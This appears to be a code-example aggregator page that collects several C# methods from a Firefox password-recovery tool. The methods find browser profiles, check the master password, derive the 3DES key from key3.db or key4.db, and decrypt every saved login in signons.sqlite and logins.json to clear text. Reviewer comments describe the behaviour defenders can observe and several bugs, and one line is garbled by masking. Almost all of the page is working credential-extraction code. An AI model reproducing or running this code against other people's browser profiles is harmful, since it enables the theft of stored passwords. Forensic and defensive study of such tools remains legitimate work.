            byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data);

            // The decrypted blob is DER again; its [0][2] field holds a further nested DER structure.
            Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001);
            Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data);

            byte[] privateKey = new byte[24];

            // Keep the last 24 bytes of field [0][3] when it is longer than 24; otherwise use the field as is.
            if (f800001deriv2.objects[0].objects[3].Data.Length > 24)
            {
                Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24);
            }
            else
            {
                privateKey = f800001deriv2.objects[0].objects[3].Data;
            }

            // decrypt username and password
            string loginsJsonPath = String.Format("{0}\\{1}", directory, "logins.json");

            Login[] logins = ParseLoginFile(loginsJsonPath);
            if (logins.Length == 0)
            {
                Console.WriteLine("No logins discovered from logins.json");
                return;
            }

            foreach (Login login in logins)
            {
                Asn1DerObject user = asn.Parse(Convert.FromBase64String(login.encryptedUsername));
                Asn1DerObject pwd  = asn.Parse(Convert.FromBase64String(login.encryptedPassword));

                // DER positions [0][1][1] and [0][2] supply the second and third decryptor arguments
                // (presumably IV and ciphertext).
                string hostname      = login.hostname;
                string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
                string decryptedPwd  = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);

                // Output keeps only U+0020..U+007F, so non-ASCII characters in a stored value are lost.
                Console.WriteLine("--- FireFox Credential (User: {0}) ---", userName);
                Console.WriteLine("Hostname: {0}", hostname);
                Console.WriteLine("Username: {0}", Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", ""));
                Console.WriteLine("Password: {0}", Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", ""));
                Console.WriteLine();
            }
        }
Ejemplo n.º 11
        /// <summary>
        /// Opens "key3.db" in <paramref name="filePath"/>, verifies <paramref name="MasterPwd"/> against the
        /// "password-check" record, and unwraps the stored key.
        /// </summary>
        /// <param name="filePath">Directory that contains key3.db.</param>
        /// <param name="MasterPwd">Password input for both key derivations.</param>
        /// <returns>
        /// Field [0][3] of the innermost DER structure, truncated to its last 24 bytes when longer; null when
        /// the check value does not start with "password-check" or any exception is thrown.
        /// </returns>
        /// <remarks>
        /// Analyst notes: a failed check is reported through ErrorHandle.ErrorFunc (its sink is not visible
        /// here); exceptions are discarded without any report, so a missing or malformed database and a wrong
        /// password both surface to the caller as null.
        /// </remarks>
        private byte[] CheckKey3DB(string filePath, string MasterPwd)
        {
            try
            {
                Converts    conv = new Converts();
                ErrorHandle eh   = new ErrorHandle();
                Asn1Der     asn  = new Asn1Der();
                BerkeleyDB  db   = new BerkeleyDB(Path.Combine(filePath, "key3.db"));

                // Verify MasterPassword
                PasswordCheck pwdCheck = new PasswordCheck((from p in db.Keys
                                                            where p.Key.Equals("password-check")
                                                            select p.Value).FirstOrDefault().Replace("-", ""));

                string GlobalSalt = (from p in db.Keys
                                     where p.Key.Equals("global-salt")
                                     select p.Value).FirstOrDefault().Replace("-", "");


                MozillaPBE CheckPwd = new MozillaPBE(conv.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), conv.ConvertHexStringToByteArray(pwdCheck.EntrySalt));
                CheckPwd.Compute();
                string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, conv.ConvertHexStringToByteArray(pwdCheck.Passwordcheck));

                // A decrypted value that does not begin with "password-check" is treated as a wrong master password.
                if (!decryptedPwdChk.StartsWith("password-check"))
                {
                    eh.ErrorFunc("Master password is wrong !");
                    return(null);
                }

                // Get private key
                // The wrapped key is the first record whose name is none of the three well-known ones.
                string f81 = (from p in db.Keys
                              where !p.Key.Equals("global-salt") &&
                              !p.Key.Equals("Version") &&
                              !p.Key.Equals("password-check")
                              select p.Value).FirstOrDefault().Replace("-", "");

                Asn1DerObject f800001 = asn.Parse(conv.ConvertHexStringToByteArray(f81));

                MozillaPBE CheckPrivateKey = new MozillaPBE(conv.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), f800001.objects[0].objects[0].objects[1].objects[0].Data);
                CheckPrivateKey.Compute();

                byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data);

                // The decrypted blob is DER again; its [0][2] field holds a further nested DER structure.
                Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001);

                Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data);



                byte[] privateKey = new byte[24];

                // Keep the last 24 bytes of field [0][3] when it is longer than 24; otherwise use the field as is.
                if (f800001deriv2.objects[0].objects[3].Data.Length > 24)
                {
                    Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24);
                }
                else
                {
                    privateKey = f800001deriv2.objects[0].objects[3].Data;
                }
                return(privateKey);
            }
            catch (Exception ex)
            {
                // ex is never used: the failure is silent and the caller sees null.
                return(null);
            }
        }
Ejemplo n.º 12
        public List <LoginFieldS> FetchPassword()
        {
            try
            {
                byte[]      privateKey = new byte[24];
                bool        loginsFound = false, signonsFound = false;
                string      signonsFile = string.Empty, loginsFile = string.Empty;;
                ErrorHandle eh        = new ErrorHandle();
                string      MasterPwd = string.Empty;
                string      filePath  = string.Empty;
                Converts    conv      = new Converts();
                // Read berkeleydb
                DataTable          dt  = new DataTable();
                Asn1Der            asn = new Asn1Der();
                List <LoginFieldS> lp  = new List <LoginFieldS>();
                var ffPath             = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Mozilla\\Firefox\\Profiles");
                if (!Directory.Exists(ffPath))
                {
                    return(lp);
                }
                var dirs = Directory.GetDirectories(ffPath);
                foreach (string dir in dirs)
                {
                    try
                    {
                        string[] files = Directory.GetFiles(dir, "signons.sqlite");
                        if (files.Length > 0)
                        {
                            filePath     = dir;
                            signonsFile  = files[0];
                            signonsFound = true;
                        }

                        // find logins.json file
                        files = Directory.GetFiles(dir, "logins.json");
                        if (files.Length > 0)
                        {
                            filePath    = dir;
                            loginsFile  = files[0];
                            loginsFound = true;
                        }



                        if (!loginsFound && !signonsFound)
                        {
                            eh.ErrorFunc("File signons & logins not found.");
                            continue;
                        }


                        if (filePath == string.Empty)
                        {
                            eh.ErrorFunc("Mozilla not found.");
                            continue;
                        }
                        // Check if files exists
                        if (!File.Exists(Path.Combine(filePath, "key3.db")))
                        {
                            privateKey = CheckKey4DB(dir, MasterPwd);
                        }
                        else
                        {
                            privateKey = CheckKey3DB(dir, MasterPwd);
                        }
                        if (privateKey == null || privateKey.Length == 0)
                        {
                            eh.ErrorFunc("Private key return null");
                            continue;
                        }


                        // decrypt username and password

                        FFLogins ffLoginData;


                        DataBase dbLocal = new DataBase();
                        if (signonsFound)
                        {
                            using (SQLiteConnection cnn = new SQLiteConnection("Data Source=" + Path.Combine(filePath, "signons.sqlite")))
                            {
                                cnn.Open();
                                SQLiteCommand mycommand = new SQLiteCommand(cnn);
                                mycommand.CommandText = "select hostname, encryptedUsername, encryptedPassword, guid, encType from moz_logins;";
                                SQLiteDataReader reader = mycommand.ExecuteReader();
                                dt.Load(reader);
                            }
                            foreach (DataRow row in dt.Rows)
                            {
                                try
                                {
                                    Asn1DerObject user          = asn.Parse(Convert.FromBase64String(row["encryptedUsername"].ToString()));
                                    Asn1DerObject pwd           = asn.Parse(Convert.FromBase64String(row["encryptedPassword"].ToString()));
                                    string        hostname      = row["hostname"].ToString();
                                    string        decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
                                    string        decryptedPwd  = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);

                                    string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "").GetUTF8String(64);
                                    string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "").GetUTF8String(64);
                                    string title    = HIOStaticValues.getTitleNameURI(hostname).GetUTF8String(64);
                                    string url      = HIOStaticValues.getDomainNameURI(hostname).GetUTF8String(256);

                                    if (dbLocal.getInfoFromDB(url, username, "").Count == 0)
                                    {
                                        lp.Add(new LoginFieldS {
                                            url = url, userName = username, password = password, title = title
                                        });
                                    }
                                }
                                catch (Exception ex)
                                {
                                    continue;
                                }
                            }
                        }
                        if (loginsFound)
                        {
                            using (StreamReader sr = new StreamReader(Path.Combine(filePath, "logins.json")))
                            {
                                string json = sr.ReadToEnd();
                                ffLoginData = JsonConvert.DeserializeObject <FFLogins>(json);
                            }

                            foreach (LoginData loginData in ffLoginData.logins)
                            {
                                try
                                {
                                    Asn1DerObject user          = asn.Parse(Convert.FromBase64String(loginData.encryptedUsername));
                                    Asn1DerObject pwd           = asn.Parse(Convert.FromBase64String(loginData.encryptedPassword));
                                    string        hostname      = loginData.hostname;
                                    string        decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
                                    string        decryptedPwd  = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);



                                    string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "").GetUTF8String(64);
                                    string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "").GetUTF8String(64);
                                    string title    = HIOStaticValues.getTitleNameURI(hostname).GetUTF8String(64);
                                    string url      = HIOStaticValues.getDomainNameURI(hostname).GetUTF8String(256);

                                    if (dbLocal.getInfoFromDB(url, username, "").Count == 0)
                                    {
                                        lp.Add(new LoginFieldS {
                                            url = url, userName = username, password = password, title = title
                                        });
                                    }
                                }
                                catch (Exception ex)
                                {
                                    continue;
                                }
                            }
                        }
                    }
                    catch (Exception ex) {
                        continue;
                    }
                }


                return(lp);
            }
            catch (Exception ex)
            {
                throw ex;
            }
        }
Ejemplo n.º 13
        /// <summary>
        /// Command-line entry point. Reads the legacy Firefox key store (key3.db) and login
        /// store (signons.sqlite) from the directory given with -f, checks the supplied master
        /// password against the stored "password-check" entry, recovers the key passed to
        /// TripleDESHelper, and writes every decrypted hostname/username/password to stdout.
        /// </summary>
        /// <param name="args">-p master password, -f profile directory, -v verbose, -h usage.</param>
        /// <returns>Always 0, including on every failure path, so callers cannot tell success from failure.</returns>
        /// <remarks>
        /// What a defender can observe from this code: a process that is not the browser opens
        /// key3.db and signons.sqlite under a profile directory, and the master password travels
        /// as a command-line argument, where process-creation logging that records command lines
        /// would capture it. Decrypted credentials are written to the console in clear text.
        /// BerkeleyDB, PasswordCheck, MozillaPBE, Asn1Der, TripleDESHelper and ByteHelper are
        /// declared elsewhere; their behaviour is described here only as far as the calls show.
        /// </remarks>
        public static int Main(string[] args)
        {
            string MasterPwd = string.Empty;
            bool   Verbose   = false;
            string filePath  = string.Empty;

            //Manage args
            // NOTE(review): -p and -f read args[i + 1] without a bounds check, so either flag
            // given as the last argument throws IndexOutOfRangeException.
            for (int i = 0; i < args.Length; i++)
            {
                if (args[i].Equals("-p"))
                {
                    MasterPwd = args[i + 1];
                }

                if (args[i].Equals("-f"))
                {
                    filePath = args[i + 1];
                }

                if (args[i].Equals("-v"))
                {
                    Verbose = true;
                }

                if (args[i].Equals("-h"))
                {
                    Console.WriteLine("FirePwd.Net v0.1");
                    Console.WriteLine("Usage :");
                    Console.WriteLine("\t -p to specify Master Password");
                    Console.WriteLine("\t -v to activate verbose mode");
                    Console.WriteLine("\t -f to specify path for files key3.db and signons.sqlite");
                    return(0);
                }
            }

            // Check if files exists
            if (!File.Exists(Path.Combine(filePath, "key3.db")))
            {
                Console.WriteLine("File key3.db not found.");
                return(0);
            }

            if (!File.Exists(Path.Combine(filePath, "signons.sqlite")))
            {
                // NOTE(review): this branch tests signons.sqlite but reports key3.db.
                Console.WriteLine("File key3.db not found.");
                return(0);
            }

            // Read berkeleydb
            DataTable dt  = new DataTable();
            Asn1Der   asn = new Asn1Der();

            BerkeleyDB db = new BerkeleyDB(Path.Combine(filePath, "key3.db"));

            if (Verbose)
            {
                Console.WriteLine(db.Version);
            }

            // Verify MasterPassword
            // Both lookups strip "-" from the stored value, which suggests db.Keys holds
            // dash-separated hex strings (TODO confirm against BerkeleyDB).
            // NOTE(review): FirstOrDefault() yields null when the key is absent, so the chained
            // .Replace throws NullReferenceException on a key3.db without these entries.
            PasswordCheck pwdCheck = new PasswordCheck((from p in db.Keys
                                                        where p.Key.Equals("password-check")
                                                        select p.Value).FirstOrDefault().Replace("-", ""));

            string GlobalSalt = (from p in db.Keys
                                 where p.Key.Equals("global-salt")
                                 select p.Value).FirstOrDefault().Replace("-", "");

            if (Verbose)
            {
                // Verbose mode writes both salts to the console.
                Console.WriteLine("GlobalSalt = " + GlobalSalt);
                Console.WriteLine("EntrySalt = " + pwdCheck.EntrySalt);
            }

            // Key and IV for the check are derived from (global salt, master password, entry salt).
            MozillaPBE CheckPwd = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), ByteHelper.ConvertHexStringToByteArray(pwdCheck.EntrySalt));

            CheckPwd.Compute();
            string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, ByteHelper.ConvertHexStringToByteArray(pwdCheck.Passwordcheck));

            // The master password is accepted only if the decrypted check value starts with
            // the literal "password-check".
            if (!decryptedPwdChk.StartsWith("password-check"))
            {
                Console.WriteLine("Master password is wrong !");
                return(0);
            }

            // Get private key
            // Takes the first entry that is not one of the three known keys; presumably the
            // store holds exactly one such entry (TODO confirm).
            string f81 = (from p in db.Keys
                          where !p.Key.Equals("global-salt") &&
                          !p.Key.Equals("Version") &&
                          !p.Key.Equals("password-check")
                          select p.Value).FirstOrDefault().Replace("-", "");

            Asn1DerObject f800001 = asn.Parse(ByteHelper.ConvertHexStringToByteArray(f81));

            if (Verbose)
            {
                Console.WriteLine("F800001");
                Console.WriteLine(f800001.ToString());
            }

            // The fixed object indexes below assume a specific ASN.1 layout; nothing validates
            // it, so a differently shaped record fails with an index or null exception.
            MozillaPBE CheckPrivateKey = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), f800001.objects[0].objects[0].objects[1].objects[0].Data);

            CheckPrivateKey.Compute();

            byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data);

            Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001);

            if (Verbose)
            {
                Console.WriteLine("F800001 first derivation");
                Console.WriteLine(f800001deriv1.ToString());
            }


            Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data);

            if (Verbose)
            {
                Console.WriteLine("F800001 second derivation");
                Console.WriteLine(f800001deriv2.ToString());
            }

            byte[] privateKey = new byte[24];

            // Keep only the trailing 24 bytes when the field is longer; otherwise use the field
            // as-is, which may then be shorter than 24 bytes.
            if (f800001deriv2.objects[0].objects[3].Data.Length > 24)
            {
                Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24);
            }
            else
            {
                privateKey = f800001deriv2.objects[0].objects[3].Data;
            }

            if (Verbose)
            {
                // byte[].ToString() returns the type name, so this line prints "System.Byte[]".
                Console.WriteLine("Private key = " + privateKey.ToString());
            }
            // decrypt username and password
            // The query text is a constant; no external input is concatenated into the SQL.
            // NOTE(review): the SQLiteCommand and SQLiteDataReader are not disposed; only the
            // connection is covered by the using block.
            using (SQLiteConnection cnn = new SQLiteConnection("Data Source=" + Path.Combine(filePath, "signons.sqlite")))
            {
                cnn.Open();
                SQLiteCommand mycommand = new SQLiteCommand(cnn);
                mycommand.CommandText = "select hostname, encryptedUsername, encryptedPassword, guid, encType from moz_logins;";
                SQLiteDataReader reader = mycommand.ExecuteReader();
                dt.Load(reader);
            }

            foreach (DataRow row in dt.Rows)
            {
                // Each encrypted field is base64 text wrapping an ASN.1 structure; the IV and
                // ciphertext are taken from fixed positions inside it.
                Asn1DerObject user = asn.Parse(Convert.FromBase64String(row["encryptedUsername"].ToString()));
                Asn1DerObject pwd  = asn.Parse(Convert.FromBase64String(row["encryptedPassword"].ToString()));
                if (Verbose)
                {
                    // NOTE(review): the next line is garbled on this page. The text between the
                    // two string literals was replaced by asterisks, apparently by credential
                    // masking during extraction, so it does not compile as shown.
                    Console.WriteLine("User= "******"Pwd= " + pwd.ToString());
                }

                string hostname      = row["hostname"].ToString();
                string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
                string decryptedPwd  = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);

                // The regex drops every character outside U+0020..U+007F, which removes
                // padding bytes but also any non-ASCII characters in the credential.
                Console.WriteLine(hostname + " " + Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "") + " " + Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", ""));
            }

            return(0);
        }
Ejemplo n.º 14
        /// <summary>
        /// Command-line entry point. Walks every directory under
        /// %APPDATA%\Mozilla\Firefox\Profiles (or the single directory given with -f), looks for
        /// signons.sqlite and logins.json, obtains a key through DBHelper.CheckKey3DB or
        /// CheckKey4DB, decrypts each stored login and prints url, username and password.
        /// </summary>
        /// <param name="args">-p master password, -f profile directory, -v verbose, -h usage.</param>
        /// <returns>Always 0, after waiting for one character on stdin.</returns>
        /// <remarks>
        /// What a defender can observe from this code: directory enumeration of the Firefox
        /// profiles folder followed by reads of key3.db or key4.db, signons.sqlite and
        /// logins.json by a process that is not the browser. The master password, when given,
        /// is a command-line argument. All recovered credentials are held as plain strings in
        /// a list and then written to the console.
        /// DBHelper, Asn1Der, TripleDESHelper, FFLogins, LoginData and LoginFieldS are declared
        /// elsewhere. <c>Verbose</c> is assigned here but not declared in this method;
        /// presumably it is a static field of the enclosing class.
        /// </remarks>
        public static int Main(string[] args)
        {
            string MasterPwd = string.Empty;

            byte[]   privateKey = new byte[24];
            bool     loginsFound = false, signonsFound = false;
            // signonsFile and loginsFile are assigned below but never read in this method.
            string   signonsFile = string.Empty, loginsFile = string.Empty;;
            string   filePath = string.Empty;
            DBHelper dbh      = new DBHelper();
            // conv is not used anywhere in this method.
            Converts conv     = new Converts();
            // Read berkeleydb
            DataTable          dt  = new DataTable();
            Asn1Der            asn = new Asn1Der();
            List <LoginFieldS> lp  = new List <LoginFieldS>();

            // NOTE(review): this enumeration runs before the arguments are parsed, so it throws
            // when the default profiles folder does not exist, even if -f supplies another path.
            List <string> dirs = Directory.GetDirectories(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Mozilla\\Firefox\\Profiles")).ToList();

            //Manage args
            // NOTE(review): -p and -f read args[i + 1] without a bounds check, so either flag
            // given as the last argument throws IndexOutOfRangeException.
            for (int i = 0; i < args.Length; i++)
            {
                if (args[i].Equals("-p"))
                {
                    MasterPwd = args[i + 1];
                }

                if (args[i].Equals("-f"))
                {
                    // -f replaces the enumerated profile list with the one given directory.
                    dirs.Clear();
                    dirs.Add(args[i + 1]);
                }

                if (args[i].Equals("-v"))
                {
                    Verbose = true;
                }

                if (args[i].Equals("-h"))
                {
                    // The usage text names only key3.db and signons.sqlite, although the code
                    // below also handles logins.json and the CheckKey4DB path.
                    Console.WriteLine("FirePwd.Net v0.1");
                    Console.WriteLine("Usage :");
                    Console.WriteLine("\t -p to specify Master Password");
                    Console.WriteLine("\t -v to activate verbose mode");
                    Console.WriteLine("\t -f to specify path for files key3.db and signons.sqlite");
                    return(0);
                }
            }
            // NOTE(review): filePath, the two "found" flags and dt are declared outside this
            // loop and never reset, so state from one directory carries into the next.
            foreach (string dir in dirs)
            {
                // Check if files exists
                string[] files = Directory.GetFiles(dir, "signons.sqlite");
                if (files.Length > 0)
                {
                    filePath     = dir;
                    signonsFile  = files[0];
                    signonsFound = true;
                }

                // find logins.json file
                files = Directory.GetFiles(dir, "logins.json");
                if (files.Length > 0)
                {
                    filePath    = dir;
                    loginsFile  = files[0];
                    loginsFound = true;
                }



                if (!loginsFound && !signonsFound)
                {
                    Console.WriteLine("File signons & logins not found.");
                    continue;
                }


                if (filePath == string.Empty)
                {
                    Console.WriteLine("Mozilla not found.");
                    continue;
                }

                if (Verbose)
                {
                    // The message names key3.db twice; the branch below chooses between the
                    // key3 and key4 helpers.
                    Console.WriteLine("Check if exist key3.db or key3.db");
                }

                // Check if files exists
                // Absence of key3.db selects the CheckKey4DB helper; both helpers are defined
                // elsewhere and receive the directory, master password and verbose flag.
                if (!File.Exists(Path.Combine(filePath, "key3.db")))
                {
                    privateKey = dbh.CheckKey4DB(dir, MasterPwd, Verbose);
                }
                else
                {
                    privateKey = dbh.CheckKey3DB(dir, MasterPwd, Verbose);
                }
                if (privateKey == null || privateKey.Length == 0)
                {
                    Console.WriteLine("Private key return null");
                    continue;
                }


                FFLogins ffLoginData;



                if (signonsFound)
                {
                    if (Verbose)
                    {
                        Console.WriteLine("Fetch users fron signons file");
                    }
                    // The query text is a constant; no external input is concatenated into the SQL.
                    // NOTE(review): the SQLiteCommand and SQLiteDataReader are not disposed.
                    using (SQLiteConnection cnn = new SQLiteConnection("Data Source=" + Path.Combine(filePath, "signons.sqlite")))
                    {
                        cnn.Open();
                        SQLiteCommand mycommand = new SQLiteCommand(cnn);
                        mycommand.CommandText = "select hostname, encryptedUsername, encryptedPassword, guid, encType from moz_logins;";
                        SQLiteDataReader reader = mycommand.ExecuteReader();
                        dt.Load(reader);
                    }
                    // Unlike the guarded loops some callers use, nothing here catches a malformed
                    // row: a bad base64 value or unexpected ASN.1 shape ends the whole run.
                    foreach (DataRow row in dt.Rows)
                    {
                        Asn1DerObject user          = asn.Parse(Convert.FromBase64String(row["encryptedUsername"].ToString()));
                        Asn1DerObject pwd           = asn.Parse(Convert.FromBase64String(row["encryptedPassword"].ToString()));
                        string        hostname      = row["hostname"].ToString();
                        string        decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
                        string        decryptedPwd  = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);

                        // Drops every character outside U+0020..U+007F, including any
                        // non-ASCII characters that were part of the credential.
                        string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "");
                        string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "");

                        lp.Add(new LoginFieldS {
                            url = hostname, userName = username, password = password
                        });
                    }
                }
                if (loginsFound)
                {
                    if (Verbose)
                    {
                        Console.WriteLine("Fetch users fron logins file");
                    }
                    // logins.json is deserialized into the FFLogins type with Json.NET;
                    // NOTE(review): a null result or null logins collection is not checked
                    // before the loop below.
                    using (StreamReader sr = new StreamReader(Path.Combine(filePath, "logins.json")))
                    {
                        string json = sr.ReadToEnd();
                        ffLoginData = JsonConvert.DeserializeObject <FFLogins>(json);
                    }

                    foreach (LoginData loginData in ffLoginData.logins)
                    {
                        Asn1DerObject user          = asn.Parse(Convert.FromBase64String(loginData.encryptedUsername));
                        Asn1DerObject pwd           = asn.Parse(Convert.FromBase64String(loginData.encryptedPassword));
                        string        hostname      = loginData.hostname;
                        string        decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
                        string        decryptedPwd  = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);



                        string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "");
                        string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "");

                        lp.Add(new LoginFieldS {
                            url = hostname, userName = username, password = password
                        });
                    }
                }
            }

            // Every collected credential is written to the console in clear text.
            foreach (var userInfo in lp)

            {
                Console.WriteLine("===================================================");
                Console.WriteLine($"url:{userInfo.url}\nUsername: {userInfo.userName}\nPassword:{userInfo.password}");
                Console.WriteLine("===================================================");
            }


            // Blocks until a character is available on stdin before returning.
            Console.Read();
            return(0);
        }
Ejemplo n.º 15
        /// <summary>
        /// Reads key material for one Firefox profile through GetItemsFromQuery (the progress
        /// message names key4.db), verifies the "password-check" value, obtains a key from
        /// decrypt3DES and prints every login found in logins.json with its decrypted
        /// username and password.
        /// </summary>
        /// <param name="directory">Profile directory; passed to GetItemsFromQuery and used to build the logins.json path.</param>
        /// <param name="userName">Used only as a label in the printed header line.</param>
        /// <param name="masterPassword">Forwarded to decrypt3DES; not used by the password-check step.</param>
        /// <returns>Always null; all results go to the console.</returns>
        /// <remarks>
        /// What a defender can observe from this code: queries against the metadata and
        /// nssPrivate tables plus a read of logins.json in the profile directory, followed by
        /// clear-text credentials on stdout. As written, the password check is derived from an
        /// empty password, so it presumably passes only for profiles without a primary password.
        /// GetItemsFromQuery, decrypt3DES, ParseLoginFile, MozillaPBE, Asn1Der and
        /// TripleDESHelper are defined elsewhere.
        /// </remarks>
        private static String Parse4Logins(string directory, string userName, string masterPassword = "")
        {
            Asn1Der asn = new Asn1Der();

            byte[] item2 = new byte[] { };
            byte[] item1 = new byte[] { };
            byte[] a11   = new byte[] { };
            byte[] a102  = new byte[] { };
            string query = "SELECT item1,item2 FROM metadata WHERE id = 'password'";

            // item1 and item2 are filled by reference; item1 is later used as the salt argument
            // of MozillaPBE and decrypt3DES.
            GetItemsFromQuery(directory, ref item1, ref item2, query);
            Console.WriteLine("Fetch data from key4.db file");

            // The fixed object indexes assume a specific ASN.1 layout; nothing validates it.
            Asn1DerObject f800001  = asn.Parse(item2);
            MozillaPBE    CheckPwd = new MozillaPBE(item1, Encoding.ASCII.GetBytes(""), f800001.objects[0].objects[0].objects[1].objects[0].Data);

            CheckPwd.Compute();

            string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, f800001.objects[0].objects[1].Data);

            if (!decryptedPwdChk.StartsWith("password-check"))
            {
                Console.WriteLine("Master password is wrong !");
                return(null);
            }

            // a102 is fetched but not read again in this method.
            query = "SELECT a11,a102 FROM nssPrivate";
            GetItemsFromQuery(directory, ref a11, ref a102, query);
            var decodedA11 = asn.Parse(a11);
            var entrySalt  = decodedA11.objects[0].objects[0].objects[1].objects[0].Data;
            var cipherT    = decodedA11.objects[0].objects[1].Data;

            byte[] privateKey;

            try
            {
                privateKey = decrypt3DES(item1, masterPassword, entrySalt, cipherT);
            }
            catch
            {
                // Any failure inside decrypt3DES is reported with one generic message; the
                // exception itself is discarded.
                Console.WriteLine("[X] Could not retrieve private key.");
                return(null);
            }

            // decrypt username and password
            string loginsJsonPath = String.Format("{0}\\{1}", directory, "logins.json");

            Login[] logins = null;
            try
            {
                logins = ParseLoginFile(loginsJsonPath);
            }
            // NOTE(review): the empty catch leaves logins null when ParseLoginFile throws, and
            // the Length check below then throws NullReferenceException.
            catch { }

            if (logins.Length == 0)
            {
                Console.WriteLine("No logins discovered from logins.json");
                return(null);
            }

            foreach (Login login in logins)
            {
                // Each encrypted field is base64 text wrapping an ASN.1 structure; the IV and
                // ciphertext are taken from fixed positions inside it.
                Asn1DerObject user = asn.Parse(Convert.FromBase64String(login.encryptedUsername));
                Asn1DerObject pwd  = asn.Parse(Convert.FromBase64String(login.encryptedPassword));

                string hostname      = login.hostname;
                string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
                string decryptedPwd  = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);

                // The regex drops every character outside U+0020..U+007F before printing.
                Console.WriteLine("--- FireFox Credential (User: {0}) ---", userName);
                Console.WriteLine("Hostname: {0}", hostname);
                Console.WriteLine("Username: {0}", Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", ""));
                Console.WriteLine("Password: {0}", Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", ""));
                Console.WriteLine();
            }

            return(null);
        }